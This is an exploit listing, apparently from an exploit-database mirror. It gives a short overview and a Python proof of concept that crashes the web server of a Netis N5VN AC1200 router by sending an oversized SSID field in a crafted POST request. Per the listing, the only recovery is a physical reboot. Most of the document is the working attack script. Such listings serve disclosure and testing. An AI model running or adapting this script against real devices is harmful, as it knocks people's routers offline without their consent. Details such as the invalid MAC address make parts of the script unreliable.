Exploit for 📄 Netis N5VN AC1200 1.0.1.1742 Buffer Overflow / Denial of Service

## https://sploitus.com/exploit?id=PACKETSTORM:223456
# Exploit Title: Netis N5VN AC1200 - Buffer Overflow DOS (Denial of Service)
    # Application: Netis N5VN AC1200 Router
    # Version: V1.0.1.1742
    # Date: 05/03/2024
    # Exploit Author: Van Lam Nguyen
    # Facebook: vanlam1412
    # Vendor Homepage: https://www.netis-systems.com/
    # Software Link: https://www.netis-systems.com/products/N5.html
    # Tested on: Windows
    # POC: https://github.com/vanlam2001/Netis-N5VN-AC1200-DOS
    
    Overview:
    ==================================================
    
    There exist a buffer overflow vulnerability in Netis N5VN AC1200 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.
    
    Proof of Concept:
    ==================================================
    
    import requests
    
    url = 'http://192.168.1.254/cgi-bin/skk_set.cgi'
    
    # Authorization details are manipulated in the complete POST request (Based on your configuration)
    headers = {
        'Authorization': 'Digest username="thepro", realm="N5VN", nonce="U3VuIFNlcCAyMSAxNDo0MzoyOSAyMDI1"',
        'Accept': '*/*',
        'X-Requested-With': 'XMLHttpRequest',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'Origin': 'http://192.168.1.254',
        'Referer': 'http://192.168.1.254/index.htm',
        'Accept-Encoding': 'gzip, deflate, br',
        'Accept-Language': 'en-US,en;q=0.9',
        'Connection': 'close'
    }
    
    data = {
        'wlanEnabled': '1',
        'wlanMacAddr': 'bc:e2:04:1g:ea:b5',
        'wlanMode': '0',
        'wlanBand': '11',
        'ssid': 'QQ==' * 5000,
        'broadSSID': '1',
        'regDomain': '1',
        'channel': '0',
        'channelWidth': '0',
        'encrypt': '6',
        'wpaPskType': '3',
        'wpaPskFormat': '0',
        'wpaPsk': 'MqwdwasdsadDkqqw2321DQ==',
        'rp_encrypt': '0',
        'wl_base_set': 'save',
        'wl_idx': '6',
        'wscConfigured': '1',
        'app': 'base',
        'wl_link': '0'
    }
    
    try:
        response = requests.post(url, headers=headers, data=data)
        print(response.text)
    except Exception as e:
        print(f"Successfully: {e}")